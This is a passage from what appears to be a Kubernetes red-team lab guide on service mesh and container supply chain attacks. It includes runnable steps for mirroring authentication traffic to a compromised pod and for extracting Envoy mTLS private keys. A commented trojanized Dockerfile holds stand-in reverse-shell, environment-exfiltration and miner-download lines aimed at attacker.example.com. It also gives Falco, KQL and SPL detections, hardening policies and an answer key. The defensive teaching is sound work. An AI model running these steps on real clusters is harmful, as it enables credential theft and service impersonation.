api-gateway-vs    [mesh]     [api.helios.example.com]   5d
auth-service-vs   [mesh]     [auth-service]             5d

$ k get virtualservice auth-service-vs -n skyforge-prod -o yaml
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: auth-service-vs
  namespace: skyforge-prod
spec:
  hosts:
  - auth-service
  http:
  - route:
    - destination:
        host: auth-service
        port:
          number: 8080
      weight: 100

# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Modify VirtualService to mirror traffic to attacker-controlled endpoint
$ cat <<'EOF' | k apply -f -
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: auth-service-vs
  namespace: skyforge-prod
spec:
  hosts:
  - auth-service
  http:
  - route:
    - destination:
        host: auth-service
        port:
          number: 8080
      weight: 100
    mirror:
      host: data-processor
      port:
        number: 9090
    mirrorPercentage:
      value: 100.0
EOF
virtualservice.networking.istio.io/auth-service-vs configured

# Now ALL traffic to auth-service is mirrored to our data-processor pod
# This includes authentication requests with credentials

Finding: Traffic Mirroring Attack

By modifying the Istio VirtualService, the attacker mirrors 100% of auth-service traffic to the compromised pod. This captures authentication tokens, credentials, and sensitive API payloads without disrupting the legitimate service. This is a stealthy man-in-the-middle attack using the service mesh itself.

Step 4.4: Extract Service Mesh Certificates¶

# Istio sidecar proxies hold mTLS certificates — extract them
# from a pod that has the istio-proxy sidecar

# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Connect to the auth-service's istio-proxy sidecar
$ k exec -it auth-service-abc123 -n skyforge-prod -c istio-proxy -- /bin/bash

# Istio stores certificates in /etc/certs/ or via SDS
$ ls /etc/certs/ 2>/dev/null || echo "SDS mode — certs delivered via Envoy SDS API"
SDS mode — certs delivered via Envoy SDS API

# Check Envoy admin interface for certificate information
$ curl -s localhost:15000/certs
{
  "certificates": [
    {
      "ca_cert": [
        {
          "path": "\u003cinline\u003e",
          "serial_number": "REDACTED",
          "subject_alt_names": [
            {
              "uri": "spiffe://cluster.local/ns/istio-system/sa/istiod"
            }
          ],
          "days_until_expiration": "364",
          "valid_from": "2026-04-07T00:00:00Z",
          "expiration_time": "2027-04-07T00:00:00Z"
        }
      ],
      "cert_chain": [
        {
          "path": "\u003cinline\u003e",
          "serial_number": "REDACTED",
          "subject_alt_names": [
            {
              "uri": "spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa"
            }
          ],
          "days_until_expiration": "0",
          "valid_from": "2026-04-07T08:00:00Z",
          "expiration_time": "2026-04-08T08:00:00Z"
        }
      ]
    }
  ]
}

# Extract the actual certificate and key from Envoy SDS
$ curl -s localhost:15000/config_dump | jq '.configs[] | select(.["@type"] | contains("SecretsConfigDump"))' > secrets_dump.json

# The certificate chain and private key are in the SDS response
$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.certificate_chain.inline_bytes' | base64 -d
-----BEGIN CERTIFICATE-----
REDACTED-CERTIFICATE-DATA
-----END CERTIFICATE-----

$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.private_key.inline_bytes' | base64 -d
-----BEGIN RSA PRIVATE KEY-----
REDACTED-PRIVATE-KEY-DATA
-----END RSA PRIVATE KEY-----

Finding: Service Mesh Certificates Extractable

An attacker with pod exec access can extract the mTLS certificates from the Envoy sidecar. These certificates can be used to impersonate the service identity (spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa) when communicating with other mesh services — effectively stealing the service's identity.

Step 4.5: Sidecar Injection Attack¶

# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Manipulate the sidecar injector to inject a malicious container alongside
# legitimate workloads. This requires cluster-admin access.

# Check current sidecar injection configuration
$ k get configmap istio-sidecar-injector -n istio-system -o jsonpath='{.data.config}' | head -20
policy: enabled
alwaysInjectSelector: []
neverInjectSelector: []
template: |
  ...

# An attacker could modify the sidecar template to include a data exfiltration container
# or modify the Envoy configuration to log all traffic to an external endpoint

# Verify which namespaces have auto-injection enabled
$ k get namespaces -l istio-injection=enabled
NAME              STATUS   AGE
skyforge-prod     Active   5d
skyforge-staging  Active   5d

Detection: Service Mesh Attacks¶

Falco Rules¶

# Falco rule: Detect VirtualService modification
- rule: Istio VirtualService Modified
  desc: VirtualService resource was created or modified — potential traffic hijacking
  condition: >
    kevt and (kcreate or kupdate) and
    ka.target.resource = "virtualservices"
  output: >
    Istio VirtualService modified (user=%ka.user.name action=%ka.verb
     name=%ka.target.name ns=%ka.target.namespace)
  priority: HIGH
  tags: [k8s, istio, service_mesh, traffic_hijack]

# Falco rule: Detect Envoy admin API access
- rule: Envoy Admin API Accessed
  desc: Process accessed Envoy admin API — potential certificate theft
  condition: >
    container and fd.sport = 15000 and evt.type in (connect, accept)
    and not proc.name in (pilot-agent, envoy)
  output: >
    Envoy admin API accessed (user=%user.name process=%proc.name
     container=%container.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [istio, envoy, admin_api]

KQL Detection¶

// KQL: Detect Istio VirtualService modification
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.objectRef.resource == "virtualservices"
    and AuditLog.verb in ("create", "update", "patch")
| extend HasMirror = AuditLog.requestObject has "mirror"
| project TimeGenerated,
    User = AuditLog.user.username,
    Action = AuditLog.verb,
    VirtualService = AuditLog.objectRef.name,
    Namespace = AuditLog.objectRef.namespace,
    HasMirror,
    SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc

// KQL: Detect direct pod-to-pod communication bypassing mesh
// Requires Istio access logs ingested into Sentinel
IstioAccessLogs_CL
| where response_flags_s has "NR"  // No route — request bypassed the mesh
| project TimeGenerated, source_workload_s, destination_workload_s,
    request_path_s, response_code_d, response_flags_s
| sort by TimeGenerated desc

// KQL: Detect Envoy admin API access
ContainerLog
| where LogEntry has "localhost:15000" or LogEntry has "127.0.0.1:15000"
| where ContainerName != "istio-proxy"
| project TimeGenerated, PodName, ContainerName, LogEntry
| sort by TimeGenerated desc

SPL Detection¶

// SPL: Detect VirtualService modification with mirror config
index=kubernetes sourcetype="kube:audit"
  objectRef.resource=virtualservices verb IN ("create", "update", "patch")
| spath "requestObject" as request_body
| eval has_mirror=if(match(request_body, "mirror"), "YES", "NO")
| table _time, user.username, verb, objectRef.name, objectRef.namespace, has_mirror

// SPL: Detect mTLS bypass — plaintext connections to mesh services
index=istio sourcetype="istio:accesslog"
| where NOT match(upstream_transport_failure_reason, "^$")
  OR tls_version="none"
| table _time, source_workload, destination_workload, request_path,
    response_code, tls_version

// SPL: Detect Envoy admin API access from unexpected processes
index=kubernetes sourcetype="kube:container-logs"
  ("localhost:15000" OR "127.0.0.1:15000")
| where container_name!="istio-proxy"
| table _time, pod_name, container_name, log

Defensive Measures: Securing the Service Mesh¶

Prevention Controls

1. Enforce STRICT mTLS Mode

apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system  # Mesh-wide
spec:
  mtls:
    mode: STRICT  # Reject ALL plaintext connections

2. Require Sidecar Injection for All Workloads

apiVersion: v1
kind: Namespace
metadata:
  name: skyforge-prod
  labels:
    istio-injection: enabled
---
# OPA policy to reject pods without sidecar
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredSidecar
metadata:
  name: require-istio-sidecar
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    namespaces: ["skyforge-prod"]
  parameters:
    sidecarName: istio-proxy

3. Restrict Istio CRD Modification

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: istio-crd-readonly
rules:
- apiGroups: ["networking.istio.io", "security.istio.io"]
  resources: ["*"]
  verbs: ["get", "list", "watch"]
  # Only mesh admins should have create/update/delete

4. Disable Envoy Admin API in Production

Set ISTIO_META_ENABLE_ADMIN_INTERFACE=false in the sidecar container or restrict to localhost with proxyAdmin port disabled.

5. Enable Istio Authorization Policies

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: auth-service-policy
  namespace: skyforge-prod
spec:
  selector:
    matchLabels:
      app: auth-service
  rules:
  - from:
    - source:
        principals: ["cluster.local/ns/skyforge-prod/sa/api-gateway-sa"]
    to:
    - operation:
        methods: ["GET", "POST"]
        paths: ["/api/v1/*"]

Exercise 4 Summary¶

Step	Action	Finding	Severity
4.1	Mesh enumeration	mTLS in PERMISSIVE mode, missing sidecar	High
4.2	mTLS bypass	Direct plaintext pod-to-pod communication	High
4.3	Traffic hijacking	VirtualService mirror attack	Critical
4.4	Certificate extraction	mTLS certs and private keys extracted	Critical
4.5	Sidecar injection	Sidecar injector modifiable by admin	High

Exercise 5: Supply Chain & Image Attacks¶

Time Estimate: 45–60 minutes ATT&CK Mapping: T1195.002 (Supply Chain Compromise), T1525 (Implant Internal Image)

Objectives¶

Identify vulnerable base images in the container registry using Trivy
Understand how a trojanized container image is constructed (educational pseudocode)
Exploit image pull policies to force deployment of malicious images
Demonstrate admission control bypass techniques
Implement image signing verification with Cosign and admission webhooks

Background¶

Supply chain attacks targeting container images are among the most impactful in cloud-native environments. A compromised base image or CI/CD pipeline can introduce backdoors into every deployment. Kubernetes image pull policies, admission controllers, and image signing are the primary defenses — but misconfigurations in any of these layers create exploitable gaps.

Step 5.1: Identify Vulnerable Base Images¶

# Scan the data-processor image for vulnerabilities
$ trivy image registry.helios.example.com/skyforge/data-processor:2.1.0

# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (debian 12.4)
============================================================
Total: 247 (UNKNOWN: 3, LOW: 42, MEDIUM: 108, HIGH: 71, CRITICAL: 23)

┌──────────────────┬──────────────────┬──────────┬────────────────┬──────────────┬──────────────────────────────────────────┐
│     Library      │  Vulnerability   │ Severity │ Installed Ver  │  Fixed Ver   │                  Title                   │
├──────────────────┼──────────────────┼──────────┼────────────────┼──────────────┼──────────────────────────────────────────┤
│ openssl          │ CVE-2024-XXXXX   │ CRITICAL │ 3.0.11         │ 3.0.13       │ Buffer overflow in X.509 certificate     │
│                  │                  │          │                │              │ verification                             │
│ curl             │ CVE-2024-YYYYY   │ CRITICAL │ 7.88.1         │ 8.5.0        │ SOCKS5 heap buffer overflow              │
│ glibc            │ CVE-2024-ZZZZZ   │ CRITICAL │ 2.36           │ 2.38         │ Stack-based buffer overflow in getaddrinfo│
│ python3.11       │ CVE-2024-AAAAA   │ HIGH     │ 3.11.2         │ 3.11.8       │ Path traversal in zipfile module         │
│ pip              │ CVE-2024-BBBBB   │ HIGH     │ 23.0.1         │ 24.0         │ Command injection via requirements file  │
│ libssh2          │ CVE-2024-CCCCC   │ HIGH     │ 1.10.0         │ 1.11.0       │ Authentication bypass in keyboard-       │
│                  │                  │          │                │              │ interactive auth                         │
│ numpy            │ CVE-2024-DDDDD   │ MEDIUM   │ 1.24.2         │ 1.26.0       │ Denial of service in array processing    │
│ ...              │ ...              │ ...      │ ...            │ ...          │ ...                                      │
└──────────────────┴──────────────────┴──────────┴────────────────┴──────────────┴──────────────────────────────────────────┘

# Check for secrets embedded in image layers
$ trivy image --scanners secret registry.helios.example.com/skyforge/data-processor:2.1.0

# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (secrets)
============================================================
Total: 3 (HIGH: 2, CRITICAL: 1)

┌─────────────────────────┬──────────┬──────────────────────────────────────────┐
│        Category         │ Severity │                 Match                    │
├─────────────────────────┼──────────┼──────────────────────────────────────────┤
│ AWS Access Key          │ CRITICAL │ AKIAIOSFODNN7EXAMPLE (layer 3)           │
│ Private Key             │ HIGH     │ -----BEGIN RSA PRIVATE KEY----- (layer 5)│
│ Generic Password        │ HIGH     │ DB_PASSWORD=REDACTED (layer 2, ENV)      │
└─────────────────────────┴──────────┴──────────────────────────────────────────┘

Finding: Critical Vulnerabilities and Embedded Secrets

The data-processor image has 23 CRITICAL and 71 HIGH vulnerabilities, plus embedded secrets including an AWS access key and private key in the image layers. Even if environment variables are changed at runtime, secrets baked into image layers are permanently recoverable from the image history.

# Scan all images in the cluster
$ for pod in $(k get pods -n skyforge-prod -o jsonpath='{.items[*].spec.containers[*].image}'); do
    echo "=== Scanning: $pod ==="
    trivy image --severity HIGH,CRITICAL --quiet "$pod"
  done

# Expected Summary (SYNTHETIC)
=== Scanning: registry.helios.example.com/skyforge/data-processor:2.1.0 ===
HIGH: 71, CRITICAL: 23

=== Scanning: registry.helios.example.com/skyforge/auth-service:1.8.3 ===
HIGH: 34, CRITICAL: 8

=== Scanning: registry.helios.example.com/skyforge/api-gateway:3.2.1 ===
HIGH: 12, CRITICAL: 2

=== Scanning: registry.helios.example.com/skyforge/report-engine:1.4.0 ===
HIGH: 45, CRITICAL: 15

Step 5.2: Trojanized Container Image (Educational Pseudocode)¶

Educational Content Only

The following demonstrates how a supply chain attack works conceptually. All code is pseudocode for defensive understanding. No functional malware is provided.

# EDUCATIONAL PSEUDOCODE — NOT FUNCTIONAL CODE
# Demonstrates how an attacker might trojanize a base image
# Purpose: Understanding the threat model for detection and prevention

# Start with the legitimate base image
FROM registry.helios.example.com/skyforge/base-image:latest

# ATTACK VECTOR 1: Add a reverse shell that activates on container start
# (PSEUDOCODE — educational illustration only)
# RUN echo '#!/bin/bash' > /usr/local/bin/health-check.sh && \
#     echo '# PSEUDOCODE: establish_reverse_connection(attacker_c2.example.com, 443)' >> /usr/local/bin/health-check.sh && \
#     chmod +x /usr/local/bin/health-check.sh

# ATTACK VECTOR 2: Modify the entrypoint to exfiltrate environment variables
# (PSEUDOCODE — educational illustration only)
# ENTRYPOINT ["/bin/sh", "-c", "env | PSEUDOCODE_SEND_TO(attacker.example.com); exec $@"]

# ATTACK VECTOR 3: Add a cryptominer as a background process
# (PSEUDOCODE — educational illustration only)
# RUN curl -o /usr/local/bin/system-monitor https://attacker.example.com/PSEUDOCODE_MINER && \
#     chmod +x /usr/local/bin/system-monitor

# ATTACK VECTOR 4: Modify libraries to intercept credentials
# (PSEUDOCODE — educational illustration only)
# RUN pip install PSEUDOCODE_BACKDOORED_PACKAGE==1.0.0

Key Takeaways for Defenders:

Image layers are additive — every RUN, COPY, or ADD creates a new layer
Secrets in any layer are permanently recoverable via docker history or docker save
Modified entrypoints or added binaries may not be visible to vulnerability scanners
Behavioral analysis (Falco) and image comparison tools are needed to detect trojanized images

Step 5.3: Exploit Image Pull Policies¶

# Check current image pull policies across all pods
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].imagePullPolicy}{"\n"}{end}'
data-processor          IfNotPresent
auth-service-abc123     IfNotPresent
auth-service-def456     IfNotPresent
api-gateway-xxx         IfNotPresent
api-gateway-yyy         IfNotPresent
api-gateway-zzz         IfNotPresent
report-engine-xxx       IfNotPresent

# The issue: IfNotPresent means once an image is cached on a node,
# it will NEVER be re-pulled — even if the registry image has been updated
# (e.g., replaced with a trojanized version)

# Demonstrate the attack:
# 1. Attacker pushes trojanized image to registry with SAME tag
# EDUCATIONAL PSEUDOCODE:
# $ docker push registry.helios.example.com/skyforge/data-processor:2.1.0
#   (trojanized version overwrites the legitimate tag)

# 2. With IfNotPresent: existing pods keep running the old (safe) image
#    BUT: any NEW pod scheduled on a node that doesn't have the image cached
#    will pull the trojanized version

# 3. Force a rollout to trigger new pulls:
# EDUCATIONAL PSEUDOCODE:
# $ k rollout restart deployment/data-processor -n skyforge-prod
#   New pods pull the trojanized image from registry

# 4. With imagePullPolicy: Always — EVERY pod restart pulls fresh,
#    so trojanized images affect ALL pods immediately

Finding: Image Tag Mutability Enables Supply Chain Attack

Using imagePullPolicy: IfNotPresent with mutable tags (like 2.1.0 or latest) means an attacker who compromises the registry can replace images. The Always policy would catch the replacement faster but also means every pod restart pulls the malicious image. The only safe approach is image digest pinning combined with image signing.

Step 5.4: Admission Control Bypass¶

# Check if admission controllers are configured
$ k api-versions | grep admissionregistration
admissionregistration.k8s.io/v1

$ k get validatingwebhookconfigurations
NAME                            WEBHOOKS   AGE
istio-validator-istio-system    1          5d

$ k get mutatingwebhookconfigurations
NAME                            WEBHOOKS   AGE
istio-sidecar-injector          1          5d

# Check for OPA/Gatekeeper
$ k get constrainttemplates
No resources found

# Check for Kyverno
$ k get clusterpolicies
error: the server doesn't have a resource type "clusterpolicies"

Finding: No Image Admission Controller

The cluster has no OPA/Gatekeeper constraints or Kyverno policies for image validation. The only admission webhooks are Istio's sidecar injector and validator. There is no policy preventing:

Images from untrusted registries
Images without signatures
Images with known critical vulnerabilities
Images using latest tag
Images running as root

# Demonstrate: deploy a pod from an untrusted registry
# EDUCATIONAL PSEUDOCODE
$ cat <<'EOF' | k apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-test
  namespace: skyforge-prod
spec:
  containers:
  - name: untrusted
    image: attacker-registry.example.com/malicious-image:latest
    command: ["sleep", "86400"]
EOF
pod/untrusted-test created
# No admission controller blocked this — the pod was created successfully

# In a properly secured cluster, this should have been DENIED by:
# 1. An admission webhook that validates image registry allowlists
# 2. An image signing policy (Cosign/Sigstore)
# 3. A vulnerability scan gate

Step 5.5: Image Signing and Verification¶

# Demonstrate proper image signing with Cosign
# EDUCATIONAL PSEUDOCODE — shows the correct defensive workflow

# Step 1: Generate a signing keypair
$ cosign generate-key-pair
Enter password for private key: REDACTED
Private key written to cosign.key
Public key written to cosign.pub

# Step 2: Sign the image after building
$ cosign sign --key cosign.key registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Pushing signature to: registry.helios.example.com/skyforge/data-processor:sha256-REDACTED_DIGEST.sig

# Step 3: Verify the signature before deployment
$ cosign verify --key cosign.pub registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Verification for registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{"critical":{"identity":{"docker-reference":"registry.helios.example.com/skyforge/data-processor"},"image":{"docker-manifest-digest":"sha256:REDACTED_DIGEST"},"type":"cosign container image signature"},"optional":{"Issuer":"https://accounts.helios.example.com","Subject":"ci-pipeline@helios.example.com"}}]

# Step 4: Enforce with admission policy (Kyverno example)
$ cat <<'EOF' | k apply -f -
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-image-signature
spec:
  validationFailureAction: Enforce
  background: false
  rules:
  - name: verify-image-signature
    match:
      any:
      - resources:
          kinds:
          - Pod
    verifyImages:
    - imageReferences:
      - "registry.helios.example.com/skyforge/*"
      attestors:
      - entries:
        - keys:
            publicKeys: |-
              -----BEGIN PUBLIC KEY-----
              REDACTED-COSIGN-PUBLIC-KEY
              -----END PUBLIC KEY-----
EOF

# Use image digests instead of mutable tags
# SECURE pod spec:
$ cat <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: data-processor-secure
  namespace: skyforge-prod
spec:
  containers:
  - name: processor
    # Pin to digest — immutable reference, cannot be replaced
    image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4e5f6REDACTED
    imagePullPolicy: Always
    securityContext:
      runAsNonRoot: true
      runAsUser: 65534
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
      capabilities:
        drop:
          - ALL
EOF

Detection: Supply Chain Attacks¶

Falco Rules¶

# Falco rule: Detect image from untrusted registry
- rule: Image from Untrusted Registry
  desc: Pod created with image from a registry not in the allowlist
  condition: >
    kevt and kcreate and ka.target.resource = "pods"
    and not ka.req.pod.containers.image pmatch (
      "registry.helios.example.com/*",
      "docker.io/library/*",
      "gcr.io/distroless/*",
      "quay.io/istio/*"
    )
  output: >
    Pod created with image from untrusted registry
    (user=%ka.user.name image=%ka.req.pod.containers.image
     pod=%ka.target.name ns=%ka.target.namespace)
  priority: HIGH
  tags: [k8s, supply_chain, untrusted_image]

# Falco rule: Detect image with latest tag
- rule: Image Using Latest Tag
  desc: Pod created with :latest tag — mutable and unverifiable
  condition: >
    kevt and kcreate and ka.target.resource = "pods"
    and ka.req.pod.containers.image contains ":latest"
  output: >
    Pod using :latest image tag (user=%ka.user.name
     image=%ka.req.pod.containers.image pod=%ka.target.name)
  priority: MEDIUM
  tags: [k8s, supply_chain, latest_tag]

# Falco rule: Detect unexpected binary execution in container
- rule: Unexpected Process in Container
  desc: An unexpected binary was executed in a known container image
  condition: >
    spawned_process and container
    and container.image.repository = "registry.helios.example.com/skyforge/data-processor"
    and not proc.name in (python3, pip, sh, bash, processor.py)
  output: >
    Unexpected process in data-processor container
    (process=%proc.name command=%proc.cmdline container=%container.name
     pod=%k8s.pod.name image=%container.image.repository)
  priority: HIGH
  tags: [container, supply_chain, unexpected_process]

KQL Detection¶

// KQL: Detect images from untrusted registries
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image !startswith "registry.helios.example.com/"
    and Image !startswith "gcr.io/distroless/"
    and Image !startswith "docker.io/istio/"
| project TimeGenerated,
    User = AuditLog.user.username,
    PodName = AuditLog.objectRef.name,
    Namespace = AuditLog.objectRef.namespace,
    Image,
    SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc

// KQL: Detect images using latest tag or no digest
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image has ":latest" or (Image !has "@sha256:" and Image !has_any (":v", ":1.", ":2.", ":3."))
| project TimeGenerated,
    User = AuditLog.user.username,
    PodName = AuditLog.objectRef.name,
    Image
| sort by TimeGenerated desc

// KQL: Detect new container image pull from untrusted source
ContainerInventory
| where ImageTag == "latest" or Image !startswith "registry.helios.example.com"
| project TimeGenerated, ContainerID, Image, ImageTag, ContainerState
| sort by TimeGenerated desc

SPL Detection¶

// SPL: Detect images from untrusted registries
index=kubernetes sourcetype="kube:audit"
  verb=create objectRef.resource=pods
| spath "requestObject.spec.containers{}.image" as image
| where NOT match(image, "^registry\.helios\.example\.com/")
    AND NOT match(image, "^gcr\.io/distroless/")
| table _time, user.username, objectRef.name, objectRef.namespace, image

// SPL: Detect images with known critical vulnerabilities (from Trivy integration)
index=trivy sourcetype="trivy:scan"
| spath "Results{}.Vulnerabilities{}.Severity" as severity
| where severity="CRITICAL"
| stats count as critical_vulns by ArtifactName, ArtifactType
| where critical_vulns > 0
| sort -critical_vulns
| table ArtifactName, critical_vulns

// SPL: Detect unexpected image pull events
index=kubernetes sourcetype="kube:events"
  reason="Pulling" OR reason="Pulled"
| spath "involvedObject.name" as pod_name
| spath "message" as msg
| rex field=msg "image \"(?<image>[^\"]+)\""
| where NOT match(image, "^registry\.helios\.example\.com/")
| table _time, pod_name, image, msg

Defensive Measures: Securing the Supply Chain¶

Prevention Controls

1. Image Digest Pinning

Always reference images by digest, never by mutable tag:

# BAD — mutable tag
image: registry.helios.example.com/skyforge/data-processor:2.1.0

# GOOD — immutable digest
image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4REDACTED

2. Registry Allowlist with Admission Controller

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  rules:
  - name: validate-registries
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Images must come from approved registries"
      pattern:
        spec:
          containers:
          - image: "registry.helios.example.com/*"

3. Vulnerability Scanning Gate in CI/CD

# CI/CD pipeline step (PSEUDOCODE)
- name: scan-image
  run: |
    trivy image --exit-code 1 --severity CRITICAL \
      registry.helios.example.com/skyforge/$IMAGE:$TAG
    # Pipeline fails if CRITICAL vulnerabilities found

4. Multi-Stage Builds with Distroless Base

# Build stage
FROM python:3.11-slim AS builder
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir --target=/install -r requirements.txt
COPY . .

# Production stage — minimal attack surface
FROM gcr.io/distroless/python3-debian12:nonroot
COPY --from=builder /install /usr/local/lib/python3.11/site-packages
COPY --from=builder /app /app
WORKDIR /app
USER 65534
ENTRYPOINT ["python3", "/app/processor.py"]

5. Container Image Signing Enforcement

Deploy Cosign + Kyverno or Connaisseur to enforce image signatures on all pod creation events.

6. Read-Only Container Filesystems

securityContext:
  readOnlyRootFilesystem: true
volumeMounts:
- name: tmp
  mountPath: /tmp
volumes:
- name: tmp
  emptyDir:
    sizeLimit: 100Mi

Exercise 5 Summary¶

Step	Action	Finding	Severity
5.1	Image vulnerability scan	23 CRITICAL + embedded secrets	Critical
5.2	Trojanized image analysis	Multiple backdoor vectors identified	Critical
5.3	Image pull policy abuse	Mutable tags enable image replacement	High
5.4	Admission control audit	No image validation policies	High
5.5	Image signing gap	No signature verification in place	High

Answer Key¶

Exercise 1: Container Escape¶

Exercise 1 Answers

Q: What Linux capability is required for the nsenter container escape? A: CAP_SYS_ADMIN is the primary capability needed. Combined with CAP_SYS_PTRACE and access to /proc, it allows entering the host's namespaces via nsenter --target 1.

Q: Why is mounting the host root filesystem at /host dangerous? A: It gives the container read-write access to the entire host filesystem, including /etc/shadow, kubelet credentials at /var/lib/kubelet/, other pods' secret volumes, and the container runtime socket. This makes container escape trivial.

Q: What is the detection gap when an attacker uses nsenter? A: After nsenter, the attacker's processes run in the host's PID namespace. Standard container-level monitoring (like container logs) will not see these processes. You need host-level monitoring (Falco as DaemonSet, auditd, or eBPF-based tools) to detect the escape.

Q: How does Docker socket access differ from nsenter escape? A: Docker socket access allows creating new containers with arbitrary configurations (privileged, host networking, etc.). nsenter enters the host's existing namespaces directly. Both achieve host access, but Docker socket abuse creates new artifacts (containers) that are more detectable.

Exercise 2: RBAC Exploitation¶

Exercise 2 Answers

Q: What is the minimum RBAC permission needed to escalate to cluster-admin? A: The ability to create ClusterRoleBinding resources (rbac.authorization.k8s.io API group, clusterrolebindings resource, create verb). An attacker can bind any existing ClusterRole (including cluster-admin) to any subject.

Q: Why is pods/exec permission dangerous? A: pods/exec allows executing commands inside any pod the SA has access to. This can be used to steal service account tokens, access mounted secrets, and pivot to other workloads — all without creating new pods.

Q: What is the RBAC escalation chain in this exercise? A: data-processor-sa (list secrets) → steal deploy-pipeline-sa token from skyforge-ci namespace → deploy-pipeline-sa has RBAC wildcard permissions → create ClusterRoleBinding granting data-processor-sa cluster-admin.

Q: How should CI/CD service accounts be properly scoped? A: CI/CD service accounts should use namespace-scoped Roles (not ClusterRoles), have permissions limited to deployments, services, and configmaps only, and should never have create/update on clusterrolebindings or secrets.

Exercise 3: etcd Secret Extraction¶

Exercise 3 Answers

Q: Why are Kubernetes secrets not encrypted by default in etcd? A: By default, Kubernetes stores secrets as base64-encoded data in etcd — base64 is an encoding, not encryption. The EncryptionConfiguration API resource must be explicitly configured to enable encryption at rest using AES-CBC, AES-GCM, or a KMS provider.

Q: What certificates are needed to access etcd? A: etcd requires mutual TLS authentication. You need the etcd CA certificate (ca.crt), a client certificate (server.crt or healthcheck-client.crt), and the corresponding private key. These are stored at /etc/kubernetes/pki/etcd/ on the control plane node.

Q: What is the difference between etcd encryption and using an external secrets manager? A: etcd encryption at rest protects secrets stored in etcd's data directory on disk. An external secrets manager (Vault, AWS Secrets Manager) removes secrets from etcd entirely — the cluster only stores references, and secrets are fetched at runtime. External managers also provide rotation, auditing, and dynamic secrets.

Q: How can you detect unauthorized etcd access? A: Monitor for: (1) etcdctl process execution on control plane nodes, (2) network connections to port 2379 from non-API-server sources, (3) file access to /etc/kubernetes/pki/etcd/ by unexpected processes, (4) etcd audit logs showing GET requests for /registry/secrets/ paths.

Exercise 4: Service Mesh Attacks¶

Exercise 4 Answers

Q: What is the difference between PERMISSIVE and STRICT mTLS modes? A: PERMISSIVE accepts both mTLS and plaintext connections — it is a transition mode. STRICT requires mTLS for all connections and rejects plaintext. Always use STRICT in production after confirming all services have sidecars.

Q: Why does direct pod-to-pod communication bypass the mesh? A: Istio's Envoy sidecar intercepts traffic on the pod's network interface. When traffic goes through the Kubernetes Service, Envoy can enforce policies. Direct pod IP communication on the application port bypasses the sidecar's iptables rules, avoiding mTLS, authorization policies, and telemetry.

Q: How does VirtualService traffic mirroring enable eavesdropping? A: Istio's mirror directive copies incoming requests to a secondary destination. The attacker adds a mirror pointing to their controlled pod, receiving a copy of every request (including headers, tokens, and body) without disrupting the legitimate traffic flow. The original service still receives and responds to all requests normally.

Q: What is the SPIFFE identity extracted from the sidecar? A: The SPIFFE identity format is spiffe://cluster.local/ns/<namespace>/sa/<service-account>. In this exercise, spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa. This identity is used for service-to-service authentication in the mesh. Stealing the certificate allows impersonating this service.

Exercise 5: Supply Chain & Image Attacks¶

Exercise 5 Answers

Q: Why is imagePullPolicy: IfNotPresent insufficient for security? A: With IfNotPresent, once an image is cached on a node, it is never re-pulled. If the registry image is replaced (trojanized), existing pods are safe but new pods on nodes without the cache will pull the malicious image. Neither IfNotPresent nor Always is secure without image digest pinning.

Q: How does image digest pinning prevent supply chain attacks? A: A digest (@sha256:abc123...) is a cryptographic hash of the image manifest. Even if an attacker pushes a new image with the same tag, the digest will be different. Kubernetes will refuse to run the image if the pulled digest does not match the specified digest.

Q: What are the three layers of supply chain defense? A: (1) Image scanning — Trivy/Grype in CI/CD to catch vulnerabilities and secrets. (2) Image signing — Cosign/Sigstore to verify image provenance and integrity. (3) Admission control — Kyverno/OPA/Connaisseur to enforce policies at deploy time (registry allowlist, signature verification, vulnerability thresholds).

